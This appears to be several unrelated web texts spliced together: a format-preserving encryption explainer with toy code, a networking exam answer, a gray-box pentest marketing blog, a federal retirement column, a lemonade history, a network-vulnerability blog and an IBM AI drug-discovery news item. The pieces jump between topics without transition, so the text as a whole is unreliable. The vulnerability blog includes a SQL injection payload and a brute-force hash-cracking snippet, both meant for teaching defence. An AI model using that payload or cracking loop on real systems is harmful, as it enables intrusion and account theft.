Format Preserving Encryption (FPE)
Format preserving encryption (FPE) is a cryptographic method that encrypts data while keeping its original format intact. Unlike traditional encryption, which often changes the structure or length of the data, FPE ensures that the encrypted output maintains the same format, such as the same length and character set as the input. This is particularly useful in situations where the data needs to fit into existing systems or databases that expect specific formats, like credit card numbers, social security numbers, or dates. FPE allows sensitive information to be encrypted without disrupting the underlying system that handles or stores the data, providing security while preserving compatibility.
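To make the format-preservation property concrete, here is an illustrative sketch in Python. It is a toy Feistel construction over even-length digit strings, not a standards-compliant scheme such as NIST's FF1 (which production systems should use); the function names and key below are hypothetical.

```python
import hmac
import hashlib

def _round_value(key: bytes, half: str, rnd: int, modulus: int) -> int:
    """Pseudorandom round function derived from HMAC-SHA256."""
    digest = hmac.new(key, f"{rnd}:{half}".encode(), hashlib.sha256).digest()
    return int.from_bytes(digest[:8], "big") % modulus

def fpe_encrypt(key: bytes, digits: str, rounds: int = 10) -> str:
    """Encrypt an even-length decimal string into another decimal string
    of the same length (toy Feistel-based FPE, not NIST FF1)."""
    assert digits.isdigit() and len(digits) % 2 == 0
    h = len(digits) // 2
    mod = 10 ** h
    left, right = digits[:h], digits[h:]
    for rnd in range(rounds):
        left, right = right, f"{(int(left) + _round_value(key, right, rnd, mod)) % mod:0{h}d}"
    return left + right

def fpe_decrypt(key: bytes, digits: str, rounds: int = 10) -> str:
    """Invert fpe_encrypt by running the Feistel rounds backwards."""
    h = len(digits) // 2
    mod = 10 ** h
    left, right = digits[:h], digits[h:]
    for rnd in reversed(range(rounds)):
        left, right = f"{(int(right) - _round_value(key, left, rnd, mod)) % mod:0{h}d}", left
    return left + right

card = "4111111111111111"
token = fpe_encrypt(b"secret key", card)
print(token)                              # 16 digits, same format as input
print(fpe_decrypt(b"secret key", token))  # 4111111111111111
```

Because the ciphertext is still a 16-digit string, it can be stored in any column or system that expects a card number, which is exactly the compatibility property described above.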
If you want multiple hosts on a network, where do you configure the setting?
To configure settings for multiple hosts on a network, you need to configure the IP addressing settings on the networking devices that are responsible for routing traffic between the hosts. This typically involves configuring the network address and subnet mask for the network segment that the hosts are connected to, as well as configuring any necessary routing protocols.
The correct answer to the exam question is A: in the IP protocol. The IP protocol is responsible for providing unique addressing for each device on the network and for routing packets between devices based on those addresses. To configure IP addressing settings, you can use a variety of methods, depending on the networking device and the software it is running. Common methods include using a command-line interface (CLI) to enter configuration commands directly on the device, using a graphical user interface (GUI) provided by the device manufacturer, or using a third-party network management tool.
Configuring IP addresses for multiple hosts on a network typically involves assigning each host a unique IP address within the network segment, and configuring the subnet mask to define the range of addresses that are considered part of the same network. For example, if you have a network segment with a network address of 192.168.1.0 and a subnet mask of 255.255.255.0, you could assign IP addresses to hosts in the range of 192.168.1.1 to 192.168.1.254.
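The 192.168.1.0/24 example above can be checked with Python's standard `ipaddress` module, which computes the usable host range directly:

```python
import ipaddress

# The network segment described above: 192.168.1.0 with mask 255.255.255.0
net = ipaddress.ip_network("192.168.1.0/255.255.255.0")

print(net.with_prefixlen)        # 192.168.1.0/24
print(net.num_addresses)         # 256 addresses in the block
hosts = list(net.hosts())        # usable host addresses (excludes network/broadcast)
print(hosts[0], "-", hosts[-1])  # 192.168.1.1 - 192.168.1.254

# Check whether a given host belongs to the segment
print(ipaddress.ip_address("192.168.1.42") in net)  # True
```

Note that of the 256 addresses in the block, only 254 are assignable to hosts: the network address (.0) and broadcast address (.255) are reserved.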
In addition to configuring IP addresses, you may also need to configure routing protocols to ensure that traffic is correctly routed between hosts on different network segments. Routing protocols such as OSPF or BGP can be used to dynamically exchange routing information between networking devices, allowing them to build and maintain a routing table that can be used to forward packets to their destination.
In summary, to configure settings for multiple hosts on a network, you need to configure the IP addressing settings on the networking devices that are responsible for routing traffic between the hosts. This typically involves configuring IP addresses and subnet masks for each host, and configuring routing protocols to ensure that traffic is correctly routed between different network segments.
In our ongoing efforts to secure our digital landscapes, the frequency of cyberattacks continues to rise, emphasizing the need for robust cybersecurity measures. Recent statistics indicate that in 2022 alone, cybercrime cost organizations an estimated $6 trillion. This alarming figure underscores the urgency of developing innovative defense strategies.
In this context, gray box penetration testing has emerged as a dynamic approach, combining realism and security to strengthen digital defenses. This article aims to provide an in-depth understanding of gray box penetration testing, including its definition, methodology, significance supported by data, and the boundaries it operates within.
What is Gray Box Penetration Testing?
Gray box penetration testing is a type of penetration testing in which the pentesters have partial knowledge of the network and infrastructure of the system they are testing. The pentesters then use this partial understanding of the system to do a better job of finding and reporting vulnerabilities in it.
In a sense, a gray box test is a combination of a black box test and a white box test. A black box test is done from the outside in, with the tester knowing nothing about the system before testing it. A white box test is done from the inside out, with the tester having full knowledge of the system before testing it. In this blog, we focus on gray box penetration testing.
Why choose Gray Box Penetration Testing?
Gray box penetration testing is a method that marries the strengths of the black box and white box approaches. Its success depends on the tester's depth of understanding of the target environment. This makes gray box testing a preferred choice in controlled settings like military and intelligence agencies.
In fact, gray box pentesting evaluates both network and physical security, making it the perfect fit for breaches involving perimeter devices such as firewalls. This approach blends techniques like network scanning, vulnerability assessment, social engineering, and manual source code review to assess all potential impacts from hackers or attackers.
How does Gray Box Penetration Testing differ from the black box and white box?
Penetration testing is divided into three categories: black box, white box, and gray box. Let’s understand the differences between these three:
| S No. | Black Box Penetration Testing | Gray Box Penetration Testing | White Box Penetration Testing |
|---|---|---|---|
| 1 | Little or no knowledge of the network and infrastructure is required. | Partial knowledge of the infrastructure, internal codebase, and architecture. | Complete access to the organization's infrastructure, network, and codebase. |
| 2 | Black box testing is also known as closed box testing. | Gray box testing is also known as translucent testing. | White box testing is known as clear box testing. |
| 3 | No syntactic knowledge of the programming language is required. | Requires a partial understanding of the programming language. | Requires an in-depth understanding of the programming language. |
| 4 | Black box testing techniques are executed by developers, user groups, and testers. | Performed by third-party services or by testers and developers. | The organization's internal development team can perform white box testing. |
| 5 | Some standard black box testing techniques are boundary value analysis, equivalence partitioning, and graph-based testing. | Some standard gray box testing techniques are matrix testing, regression testing, orthogonal array testing, and pattern testing. | Some standard white box testing techniques are branch testing, decision coverage, path testing, and statement coverage. |
5 steps to Perform Gray Box Penetration Testing
Gray box penetration testing is usually performed in 5 different steps mentioned below:
1. Planning and Requirements Analysis:
This phase includes understanding the scope of the application and the tech stack being used. The security team also requests some application-related information, such as dummy credentials and access roles. Preparing a documentation map is also part of this phase.
2. Discovery Phase:
This phase is also known as Reconnaissance, which includes discovering the IP addresses being used, hidden endpoints, and API endpoints. The Discovery phase is not limited to networks but includes gathering information about the employees and their data, also known as Social Engineering.
3. Initial Exploitation:
Initial exploitation includes planning what kinds of attacks will be launched in the later steps, as well as finding misconfigurations in the servers and cloud-based infrastructure. The information requested earlier helps the security team create various attack scenarios, such as privilege escalation. With the provided credentials, scanning behind the login also becomes possible.
4. Advanced Penetration Testing:
This phase includes launching all planned attacks on the discovered endpoints, along with the execution of social engineering attacks based on the collected information about employees. Furthermore, the various vulnerabilities found are combined to create real-life attack situations.
5. Document & Report preparation:
The last step is preparing a detailed report of every endpoint tested along with a list of launched attacks.
Top 3 Gray Box Penetration Testing Techniques
Gray box pentest uses various types of techniques to generate test cases. Let’s understand some of them in detail:
1. Matrix testing
Matrix testing is a software testing technique that helps to test the software thoroughly by identifying and removing all unnecessary variables. Programmers use variables to store information while writing applications; the number of variables should match the requirement, otherwise the extra variables reduce the efficiency of the program.
2. Regression testing
Regression testing is retesting software components to find defects introduced by changes made previously or in the first testing iteration; it is also known as retesting. It is performed to ensure that weaknesses are not introduced or reintroduced into a software system by modifications after the initial development. Regression testing is an essential part of software testing because it helps ensure that newly introduced software features continue to work as intended.
3. Orthogonal Array Testing
Orthogonal array testing is a software testing technique used to reduce test cases without reducing the test coverage. Orthogonal array testing is also known as the Orthogonal array method (OAM), Orthogonal array testing method (OATM), and Orthogonal test set.
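As a small illustration of the idea (the factor names are hypothetical), the following sketch compares an exhaustive test set with a standard L4(2^3) orthogonal array for three two-level factors; the array covers every pairwise combination of factor values with half the test cases:

```python
from itertools import product, combinations

factors = ["browser", "os", "network"]   # three hypothetical two-level factors

full = list(product([0, 1], repeat=3))   # exhaustive: 2^3 = 8 test cases
# A standard L4(2^3) orthogonal array: only 4 runs
l4 = [(0, 0, 0), (0, 1, 1), (1, 0, 1), (1, 1, 0)]

def covers_all_pairs(runs):
    # Every pair of factors must exhibit all 4 two-value combinations
    for i, j in combinations(range(3), 2):
        seen = {(r[i], r[j]) for r in runs}
        if len(seen) < 4:
            return False
    return True

print(len(full), covers_all_pairs(full))  # 8 True
print(len(l4), covers_all_pairs(l4))      # 4 True
```

The orthogonal array halves the number of test cases here while still exercising every pairwise interaction, which is the coverage-per-case trade-off the technique is designed for.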
What are the Benefits of Gray Box Penetration Testing?
1. Insider Information: Gray box testing is a perfect blend of black-box testing with knowledge of specific internal structures (or “inside knowledge”) of the item being tested. This inside knowledge could be available to the tester in the form of design documentation or code.
2. Less time-consuming: With insider knowledge, testers can plan and prioritize the testing, which takes less time than planning test cases with no understanding of the network or codebase.
3. Non-intrusive and unbiased: Gray box testing is also called non-intrusive and unbiased, and is said to be the best way to analyze a system without its source code. The gray box test treats the application as a black box: the tester knows how program components interact with each other but not the detailed program functions and operations.
How Does Gray Box Testing Help Secure Your System?
While black-box tests mimic user experience without application knowledge, gray-box testing uses some information for more accurate user-like interactions.
In the face of determined outsiders despite standard security measures, gray box pentesting excels by focusing on post-breach behavior.
By using the above, you not only bolster system security against external threats but also guard against insider risks. The testers' partial understanding of the application allows realistic user-experience simulations, uncovering errors, vulnerabilities, and exploits before cybercriminals do.
Why is Astra's Pentest Suite a perfect fit for you?
All 3 types of penetration testing techniques have their own pros and cons but which one is perfect for you? Astra’s pentest suite is equipped with real-life hacking intelligence gathered from 1000+ vulnerability assessments and penetration tests (VAPT) done by our security experts on varied applications.
Say NO to the old, boring way of testing your organization's security. Astra's Vulnerability Scanner is continuously learning from new CVEs, bug bounty data, and intelligence gathered from the pentests we do for companies in varied industries. Your CXOs get a bird's-eye view of the security posture of your organization, with data-backed insights that help them make the right decisions.
In addition, to ensure the utmost security, we at Astra believe in 'proactive security' measures: we anticipate the infiltration techniques used by hackers and recommend additional security countermeasures to keep your and your customers' data secure.
Features of Astra’s pentest suite:
- Self-served, on-the-cloud continuous scanner that runs 2500+ test cases covering OWASP, SANS, ISO, SOC, etc.
- Rich and easy-to-understand dashboard with a graphical representation that helps with vulnerability & patch management.
- Developer & CXO level reporting.
- Team collaboration options for assigning vulnerabilities for fixing.
- Multiple asset management under the same scan project.
- A dedicated ‘Vulnerabilities’ section that offers insights on vulnerability impact, severity, CVSS score, and potential loss (in $).
- A comprehensive scanner that includes all the mandatory local and global compliance requirement checks.
It is one small security loophole v/s your entire website or web application.
Get your web app audited with Astra's Continuous Pentest Solution.
1. What are the 5 stages of penetration testing?
Penetration testing comprises 1) reconnaissance, where information about the target is gathered; 2) scanning, identifying potential vulnerabilities; 3) gaining access through exploits; 4) maintaining access, testing for persistence; and 5) analysis, evaluating findings, and producing a comprehensive report for remediation. Find out more on the penetration testing guide.
Q: What do some of the government’s oldest and longest-serving employees have in common with the hairy-nosed wombat?
A: Both are on the endangered species list. The difference is that the wombat population is growing ever so slightly, whereas the long-time CSRS-covered civil servants grow fewer each year.
CSRS stands for Civil Service Retirement System. It's a stand-alone plan — like the private sector had back in the day — where employees contribute a small portion of their income and Uncle Sam offers them a lifetime annuity with inflation protection.
CSRS was replaced by the Federal Employee Retirement System in the 1980s. FERS offers a less generous civil service annuity, Social Security coverage and a more generous 401k plan — the Thrift Savings Plan — than available to CSRS employees. The FERS program forces workers to finance more of their retirement and costs Uncle Sam less. At the time of the switch there was speculation that when the number of CSRS employees got to a certain level, the government might seek to move them into FERS (which would require legislation) to save money. So is that end date approaching?
In 1994, according to the Congressional Research Service, just over half (52%) of all federal workers (1.4 million) were under the CSRS program. That has dropped dramatically as CSRS-covered people leave government, retire or die. In 2016 the CSRS population was less than 6%. There were 159,000 under CSRS, compared to 2,529,000 under FERS. That gap continues to grow.
Meantime, many CSRS workers are closing in on 41 years, 11 months of service when they can retire on the equivalent of 80% pay, more than double the benefit available under FERS.
So what if the government — or one of its independent operations — gave current CSRS employees a choice: Retire by a to-be-determined date and get full CSRS credit for their annuity, or continue in their jobs but with future benefits compiled under the less-generous FERS system.
A high-ranking, longtime career official said he’s heard there is a plan in the works that would end the CSRS program by giving employees the option. He said it would save the government salary money, reduce future retirement costs and give agencies the option of filling those CSRS jobs with lower-paid (less senior) people, or not filling them at all.
The head of a professional group with an excellent legislative tracking service said "I have not heard this," he said. But he added, "I try to keep abreast of what is happening at U.S. Postal Service because, as a quasi-government federal entity, they seem to have their own set of rules. For example, an issue that I believe recently jumped out in the news was that one of their supervisor groups was negotiating a new salary deal! So anything may be possible at USPS!"
USPS, unlike most other federal operations, negotiates over wages and working conditions with powerful unions representing the clerk, carrier and mail handler crafts. And, it is working on a business plan showing how it can cut costs, including retirement and health insurance, in the future. Some other federal operations, like the Federal Deposit Insurance Corporation, Comptroller of the Currency and the Federal Reserve, have more generous wages and benefits. If the government wanted to test an end-CSRS program without going through Congress, any of them would be a likely place to start.
So if it happens, and that is a gigantic, speculative if at this point, and if you are with CSRS, would you take the bait, or switch to FERS and continue working?
Lemonade has been a quintessential summer refresher since our childhood. In fact, running a lemonade stand was the first taste many of us had with American capitalism. But like the apple pie, lemonade is not an American invention. It was around long before America itself. Lemons, which originated in Asia (India, northern Burma and China), had made their way to the Mediterranean coast and Egypt by the 12th century. Although it may have been drunk even earlier, the first written evidence of lemonade consumption comes from the writings of Persian poet Nasir-I-Khusraw. By the mid-1600s, the taste for lemonade had spread to Europe, and street-side "limonadiers" sold cups of a honey-sweetened version of the drink to passing Parisians. By the 18th century, lemonade had immigrated along with hundreds of thousands of Europeans to America.
The digital world is under constant risk as cyber-attacks become increasingly advanced and grow at a staggering rate. While significant developments have been made to mitigate cyber risk, attackers continue to evolve their methods to gain unauthorized access and steal data from companies.
According to Cloudwards Cybersecurity Statistics 2024, Cybersecurity intrusions increased by 613% from 2013 to 2023.
In this digital age, despite every organization's awareness of cybersecurity risk, many organizations still neglect to implement protective measures to mitigate network vulnerabilities, giving cyber attackers an opportunity. This blog will help you understand the types of network vulnerabilities and network threats and how to mitigate them, but first let us start with the meaning of network vulnerabilities.
What Are Network Vulnerabilities?
A network vulnerability is an inherent weakness or design flaw in a system's software, hardware, network, or organizational processes that creates a looming threat to an organization's data, systems, or processes. In the event of a cyber-attack, such a vulnerability leads to compromised data security.
5 Common Types of Network Security Vulnerabilities
Staying ahead of network threats is difficult, but not impossible. One needs to understand the nature of different network security vulnerabilities in their own system as the first step of mitigating the security risk. Perpetrators are constantly searching for ways to take advantage of network vulnerabilities in the dynamic virtual world. Recognizing the typical categories of network security weaknesses is the first line of defense for your digital assets against intrusions.
1. Physical Vulnerabilities
One of the most common mistakes made while securing digital assets is overlooking the physical component of security: the lack of secure infrastructure around servers or any other asset that can give access to your network or data. This includes vulnerabilities like:
- Unsecured data centers: Unlocked data centers, lack of surveillance, or lack of access control system.
- Unauthorized access: No safety measures in place to ensure that only personnel with proper clearance can access servers.
2. Software-Based Vulnerabilities
No matter how secure the physical hardware or servers are, a device runs several pieces of software to work efficiently, and if any of that software has a weakness, it is only a matter of time before a hacker tries to exploit it. Software-based vulnerabilities include:
- Outdated software: Developers constantly watch for new threats and errors and release updates to fix those bugs; running outdated versions leaves those known flaws open to exploitation.
- Operating system flaw: Bugs or weaknesses in the operating system can lead to attackers gaining control over your network.
- Third-party software risk: Sharing sensitive data with third-party software puts you in a risky position, as that data can be exploited if the third party is careless or compromised.
3. Human-Based Vulnerabilities
Humans are considered the weakest link as they inadvertently introduce vulnerabilities to any system. Employees, contractors, customers, and sometimes even vendors can bring network security threats to your doorstep. Common human-based vulnerabilities include:
- Phishing attacks: These are email or message-based network security attacks designed to manipulate the user into clicking on a harmful link.
- Social engineering attacks: It is a deceptive strategy to exploit human psychology to trick them into sharing sensitive information or compromising security through some malicious action.
- Accidental errors: People inevitably make mistakes, and these errors often create network security risks.
4. Configuration-Based Vulnerabilities
Oversights in the configuration of network devices, weak firewalls, and a lack of access control can pose a significant threat to the organization. These misconfigurations leave the network exposed to a number of threats. Primary configuration-based vulnerabilities include:
- Weak passwords: Setting default passwords or easily predictable passwords can also compromise network security.
- Firewall misconfiguration: A firewall is the first line of defense for a secure network, and a firewall vulnerability is therefore a critical network threat.
- Unsecured Network Access Points: These are the open doors of any network offering direct entry to attackers to infiltrate any system.
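To illustrate the weak-password point above, a minimal password-policy check might look like the following sketch (the rules, minimum length, and blocklist are assumptions for illustration, not a recommendation of a specific standard):

```python
import re

def meets_policy(password: str, min_length: int = 12) -> list:
    """Return the list of policy rules a password fails (empty list = OK)."""
    failures = []
    if len(password) < min_length:
        failures.append(f"shorter than {min_length} characters")
    if not re.search(r"[a-z]", password):
        failures.append("no lowercase letter")
    if not re.search(r"[A-Z]", password):
        failures.append("no uppercase letter")
    if not re.search(r"\d", password):
        failures.append("no digit")
    if not re.search(r"[^A-Za-z0-9]", password):
        failures.append("no special character")
    if password.lower() in {"password", "admin", "123456", "letmein"}:
        failures.append("on the common-password blocklist")
    return failures

print(meets_policy("admin"))                   # fails several rules
print(meets_policy("c0rrec7-H0rse-B4ttery!"))  # []
```

Checks like this are typically enforced at account creation and password change, closing the "default or predictable password" gap described above.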
5. IoT and Device Vulnerabilities
IoT devices are built for convenience and tend to attract attackers, as they offer minimal to no protection against cyber-attacks. Common IoT and device vulnerabilities include:
- Insecure default setting: Most IoT devices are shipped with default settings and passwords that can be easily found in online handbooks and help centers.
- Lack of encryption: IoT devices often communicate over unencrypted networks, making it easy to breach sensitive data.
- Firmware vulnerabilities: Firmware that is difficult or impossible to update leaves these devices insecure even after a patched version has been released.
By understanding these network vulnerabilities an organization can take proactive steps to prevent and mitigate the risk of network threats.
Understanding Network Security Threats
Day by day, networks are growing not just in size but also in complexity as new SaaS tools are introduced and data centers shift to new methods of storage. With this growth, brand-new threats are constantly emerging, putting the confidentiality, integrity, and availability of data and resources at risk.
A clear understanding of these threats is the first step toward taking robust preventive actions.
5 Types of Network Security Threats
Scroll down to explore some of the most common types of network security threats.
1. Malware and viruses
Short for malicious software, malware is one of the most significant threats to any network's security. Malware includes viruses, worms, trojans, ransomware, spyware, adware, and many more. Malware exploits network vulnerabilities and leads to compromised data.
The most common malware is the virus, which spreads through infected programs, files, or external storage devices. It causes extensive problems, sometimes slowing systems down and at other times freezing them completely.
The most dangerous malware is ransomware, which encrypts data so that attackers can extort payment in exchange for unlocking it. These network security attacks can cripple an organization by making its data unusable, leading to monetary loss and, in worst-case scenarios, lawsuits.
2. Phishing and social engineering attacks
Unsuspecting people are one of the biggest threats to a network, as they can intentionally or unintentionally be manipulated into revealing an organization's sensitive information. In social engineering, hackers exploit people's sense of trust to trick them into performing actions that compromise the safety of the business's data and systems.
Social engineering includes phishing, in which a user trusts a fake email or website designed to steal information. While preventive actions are primarily aimed at intentional data breaches, many researchers have found that most cyber-attacks are a result of sheer negligence on the part of employees.
3. DDoS and botnet attacks
DDoS stands for distributed denial of service. In this, the attacker sends an overwhelming amount of bogus or artificial traffic to an organization’s website or application. This traffic results in the unavailability of the network for genuine users.
Botnet is short for "robot network"; botnets are created to launch large-scale DDoS attacks, send spam emails, or perform other malicious activities. They primarily infect IoT devices so the hacker can have remote control over the network.
A DDoS attack can cause significant monetary loss, and reputational damage. It can also be used as a distractive method to launch a much bigger and harmful attack.
4. Man-in-the-middle (MitM) attacks
As the name suggests, an MitM attack occurs when a hacker eavesdrops between the user and an application to steal information, later using that stolen information for blackmail or other malevolent actions.
MitM attacks mostly succeed because of unsecured or poorly encrypted network traffic. The attacks are carried out in two phases: the attacker first intercepts user traffic and then decrypts the data without the user's knowledge.
Furthermore, MitM can be disastrous if the attacker gains a foothold inside the server during the infiltration.
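One standard defense against the in-transit tampering that MitM attacks rely on is message authentication. The sketch below (the shared key and messages are hypothetical) uses Python's standard `hmac` module to detect a modified message:

```python
import hmac
import hashlib

SHARED_KEY = b"pre-shared secret"  # assumed to be exchanged out of band

def sign(message: bytes) -> bytes:
    """Compute an HMAC-SHA256 authentication tag for the message."""
    return hmac.new(SHARED_KEY, message, hashlib.sha256).digest()

def verify(message: bytes, tag: bytes) -> bool:
    """Constant-time comparison avoids timing side channels."""
    return hmac.compare_digest(sign(message), tag)

msg = b"transfer $100 to account 42"
tag = sign(msg)

print(verify(msg, tag))                        # True: untampered
tampered = b"transfer $100 to account 99"      # modified in transit
print(verify(tampered, tag))                   # False: tampering detected
```

Authentication alone does not provide confidentiality; in practice TLS combines encryption and message authentication so an eavesdropper can neither read nor silently alter traffic.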
5. SQL injection and other cyber-attacks
SQL injection is a common web security vulnerability that interferes with the queries an application makes to its database on the user's behalf. These attacks manipulate databases on servers by injecting harmful SQL code into input fields. Performed at scale, they allow attackers to view, modify, delete, or steal data, compromising its reliability; in worst-case scenarios, the attacker targets the back-end infrastructure directly, resulting in a denial-of-service attack.
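The difference between a vulnerable query and a parameterized one can be demonstrated with Python's built-in `sqlite3` module (the table and attacker input are illustrative):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, is_admin INTEGER)")
conn.execute("INSERT INTO users VALUES ('alice', 0), ('bob', 1)")

attacker_input = "x' OR '1'='1"

# VULNERABLE: user input concatenated directly into the query text
unsafe = f"SELECT name FROM users WHERE name = '{attacker_input}'"
print(conn.execute(unsafe).fetchall())   # returns every row!

# SAFE: parameterized query -- the input is treated as data, not SQL
safe = "SELECT name FROM users WHERE name = ?"
print(conn.execute(safe, (attacker_input,)).fetchall())  # []
```

The injected `' OR '1'='1` turns the vulnerable query's WHERE clause into a condition that is always true, while the parameterized version searches for the literal string and matches nothing.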
These are a few of the most common network threats, but cyber-criminals are always searching for new ways to identify and take advantage of any network security vulnerabilities. In order to protect themselves, organizations must be watchful and take preventative action, such as implementing the newest firewalls and security technologies, updating their software frequently, and providing employee training.
Tools and Techniques for Vulnerability Assessment
Understanding network vulnerabilities and network threats is the first phase of protecting the digital assets of an organization. In the next step, one needs to effectively and regularly assess where vulnerabilities could exist.
Here are some essential tools and techniques for vulnerability assessment of network:
Penetration testing
Penetration testing, popularly known as "pen testing", is a technique in which an organization hires ethical hackers or security professionals to simulate an attack on the network and test the organization's defenses. The hired professionals try to breach the system and find any underlying vulnerability before a real hacker does.
Penetration testing helps uncover system weaknesses such as physical vulnerabilities, software-based vulnerabilities, or any misconfiguration in the network. Regular pen testing also assesses the human element, to ensure that even social engineering cannot break the organization's security posture.
Regular security audits
Regular security audits are a crucial factor in mitigating any network threat. These audits are performed to find any flaw or potential risk that may jeopardize the organization’s data and system. These audits are conducted either by the internal IT team or a third-party security professional.
The auditors make sure that the company's information system conforms to both external and internal IT regulations. Both internal and external audits have benefits: internal auditors have in-depth knowledge of the organization's network, while external auditors can offer objective audit results.
Best Practices to Mitigate Network Vulnerabilities
Other than risk assessment there are some common practices that organizations adopt to diminish network vulnerabilities. Here are some key strategies to enhance network security:
Regular Software Updates and Patch Management
All software developers release regular updates to patch security loopholes that can endanger the organization's data. Regularly updating all software, including operating systems, applications, and firmware, is a reliable way of closing off network threats that exploit known software flaws. Conversely, delays in updating software expose your network and systems to known and unknown network threats.
Strong Password Policies
Default or weak passwords are like an open door for hackers, creating network security concerns. A "brute-force attack," also known as password cracking, is a popular method hackers use to guess passwords.
As a downside of advanced technology, hacking software designed for brute-force attacks is easily available. Organizations should enforce strong password policies and, if necessary, multi-factor authentication (MFA) in order to protect themselves.
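To see why short, low-entropy passwords fall to brute force, the following sketch exhaustively searches a small keyspace (the password and the use of plain SHA-256 are illustrative; real systems should use salted, deliberately slow hashes such as bcrypt or Argon2):

```python
import itertools
import string
import hashlib

def brute_force(target_hash: str, charset: str, max_len: int):
    """Try every candidate up to max_len; return the match or None."""
    for length in range(1, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            candidate = "".join(combo)
            if hashlib.sha256(candidate.encode()).hexdigest() == target_hash:
                return candidate
    return None

# A hypothetical 4-character, lowercase-only password
weak = hashlib.sha256(b"dogs").hexdigest()
print(brute_force(weak, string.ascii_lowercase, 4))  # dogs

# Keyspace sizes: 4 lowercase chars vs. 12 mixed-charset chars
print(26 ** 4)  # 456976 candidates -- trivially searchable
print(len(string.ascii_letters + string.digits + string.punctuation) ** 12)
```

The 4-character search finishes in well under a second on commodity hardware, while the 12-character mixed-charset keyspace (94^12) is many orders of magnitude larger, which is exactly why length and charset requirements matter.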
Employee Training and Awareness Programs
Humans are often the weakest link in any organization's security. Hence, it is important to regularly educate employees about network security risks and best practices. Training sessions should cover phishing attacks, social engineering, the dangers of weak passwords, and other potential risks. Regular training programs eventually create a culture of cyber awareness that can reduce security breaches.
Implementing Firewalls and Intrusion Detection Systems (IDS)
Robust firewalls and intrusion detection systems can detect threats and alert security teams to take preventive action. Detection works by monitoring and analyzing incoming and outgoing traffic; suspicious activity is treated as a potential threat and the cyber security team is alerted. An IDS works best when integrated with an intrusion prevention system (IPS), which can not only detect malicious activity but also take proactive action to block it.
Secure Configuration Management
Misconfigured devices such as routers, servers, and IoT devices pose a big security risk for any organization. Secure configuration means disabling unnecessary services, changing default settings, and replacing default passwords with strong ones. Organizations should also apply the principle of least privilege, which states that users should only get the access they absolutely require.
Data Encryption
A useful way to keep data safe from unwanted use is to encrypt it both in transit and at rest. Comprehensive encryption guarantees that a hacker cannot decipher and misuse the data even if it is intercepted or captured. Organizations should implement strong encryption protocols and keep improving their practices to keep pace with evolving threats.
Fidelis Network Detection and Response (NDR)
Fidelis NDR is a one-stop tool aimed at swiftly identifying and responding to network threats. It works as a first line of defense, proactively monitoring traffic; when it detects behavioral anomalies or indications of malicious activity, it alerts security teams. Fidelis NDR is equipped with a range of detection and response technologies to do this.
Frequently Asked Questions
What are some of the most common vulnerabilities that exist in a network?
There are several common network vulnerabilities, including but not limited to:
- Physical vulnerabilities: Weak physical security around servers can give perpetrators direct access to data.
- Software vulnerabilities: Outdated software, or software obtained from unauthorized vendors, makes your system vulnerable to attack.
- Configuration vulnerabilities: Misconfigured devices create an entry point for intruders.
- Human-based vulnerabilities: Untrained and unsuspecting employees often fall for phishing and other social engineering attacks, compromising an organization's data. They are also among the most common network vulnerabilities.
- IoT vulnerabilities: IoT devices are often poorly configured, with weak encryption, leading to cyber attacks.
How Do Network Vulnerabilities Impact Businesses?
Network vulnerability often leads to many negative impacts on the business, some of which are:
- Data breach: Exploited network vulnerabilities often lead to the compromise of an organization's sensitive information.
- Disruption of operations: Attacks such as DDoS or SQL injection can cause denial or disruption of services.
- Financial loss: Recovering stolen data, disruption of operations, and hefty lawsuits can cause monetary loss to businesses.
- Reputational loss: Any security breach damages customer confidence resulting in loss of business.
- Compliance violation: Data breaches due to negligence attract big fines and lawsuits.
How Can Network Vulnerabilities Be Identified?
There are tried and tested methods to identify any underlying network vulnerabilities.
- Penetration testing: Testing the system through simulated attacks makes the organization aware of hidden or intrinsic flaws.
- Security audits: Regular security audits help assess whether network security measures comply with internal IT policies and industry regulations.
- Monitoring tools: There are firewalls and intrusion detection systems (IDS) available to detect any intrusion and alert the cyber security team.
What Is the Difference Between Network Vulnerabilities and Network Threats?
Network vulnerabilities: These are the design flaws in the system that can be exploited by hackers. These vulnerabilities include unpatched software, misconfigured devices, weak passwords, vulnerable IoT devices, etc.
Network threat: Network threats are the methods of attack that hackers use to exploit the vulnerable network. These threats include phishing attacks, Botnets, physical sabotage, viruses, SQL injection, etc.
How Can IoT Devices Introduce Network Security Vulnerabilities?
Security is often neglected when IoT devices are produced, because they are designed primarily for convenience. This makes them some of the most vulnerable machines on a network, and prime targets for hackers:
- Weak default settings: Keeping an IoT device's default settings can give an attacker unauthorized access to your network.
- Weak encryption: Strong encryption is often neglected in IoT devices, making them easy to exploit.
- Insecure firmware: The firmware of such devices is difficult to update for a layman, creating an easy entry point for a potential attack. | <urn:uuid:47696fb4-b06b-4ff2-874d-cf4b19c452a1> | CC-MAIN-2024-38 | https://fidelissecurity.com/threatgeek/network-security/common-network-vulnerabilities-and-threats/ | 2024-09-14T05:19:51Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651548.18/warc/CC-MAIN-20240914025441-20240914055441-00823.warc.gz | en | 0.926694 | 3,326 | 2.71875 | 3 |
IBM has been expanding generative AI models beyond language to apply the technology to the discovery of biological compounds. Results have since shown that this AI model can generate successful antiviral molecules for multiple target virus proteins, including SARS-CoV-2 (COVID-19).
At the time of the paper’s submission, antiviral properties of 11 molecules were successfully validated by Oxford researchers. This discovery has been hailed as a breakthrough that could get lifesaving drugs to people much faster.
A new class of AI-generated COVID antivirals
The AI world has seen plenty of healthcare breakthroughs recently, with cutting-edge software helping with new treatments and improving efficiency for patients.
In the study, researchers show that new antivirals can be designed, made and potentially validated in months. This type of AI breakthrough could see lifesaving drugs reach people faster in the next global healthcare crisis.
In collaboration with Enamine, a chemical supplier in Ukraine, and other researchers at the University of Oxford, the IBM team created a foundation model that was versatile enough to create new inhibitors for multiple protein targets without extra training.
The result was that the team hit on four potential COVID-19 antivirals in a fraction of the time it would have taken using conventional methods. Although the molecules still need to clear clinical trials, this highlights the huge role that AI can play in the future of drug development.
“It took time to develop and validate these methods, but now that we have a working pipeline in place, we can generate results much faster,” said study co-author and IBM researcher, Payel Das.
“When the next virus emerges, generative AI could be pivotal in the search for new treatments.”
CogMol foundation model helps fight drug resistance
Developing new drugs is often slow. In the future, new drugs may be required to tackle new viruses and superbugs. Generative AI could act as a solution, with its ability to create molecules as highlighted in the outcome of this study.
Two of the AI-generated COVID-19 antivirals the researchers discovered bind to the virus's spike protein in a distinctly new way. If developed into drugs, they could potentially complement some of today's COVID antivirals.
